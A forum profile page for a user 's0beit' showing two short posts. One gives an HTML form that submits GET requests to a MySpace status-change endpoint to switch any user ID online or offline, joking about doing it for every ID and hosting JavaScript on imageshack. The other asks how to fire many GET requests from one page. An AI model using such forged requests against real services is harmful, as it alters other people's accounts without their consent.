Jump to content

s0beit

New Members
  • Posts

    2
  • Joined

  • Last visited

    Never

Profile Information

  • Gender
    Not Telling

s0beit's Achievements

Newbie

Newbie (1/5)

0

Reputation

  1. do this: [code]<form action="http://onlinenow.myspace.com/OnlineNow/UserStatusChange.html" method="get" name="form1" class="style1"> <center> User ID:   <input type="text" name="UserID">   <br><br>Status:   <select name="online">     <option value="1">Online</option>     <option value="0">Offline</option>   </select>   <br>   <br>   <input type="hidden" name="visible" value="1">   <input type="hidden" name="id" value="68143"> <!-- &online=1&visible=1&id=68143 -->   <input name="" type="submit" value="Submit">   </center> </form>[/code] for every ID on myspace, rofl. javascript is even better, as i can run that off of imageshack  ;D
  2. i want to send multiple GET HTTP requests from one page, how can this be done? i want to report to the page like so: [code]report_to_page("http://fake.com/test.php?id=".$number;[/code] ive got no answers from other forums, help if you can please.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.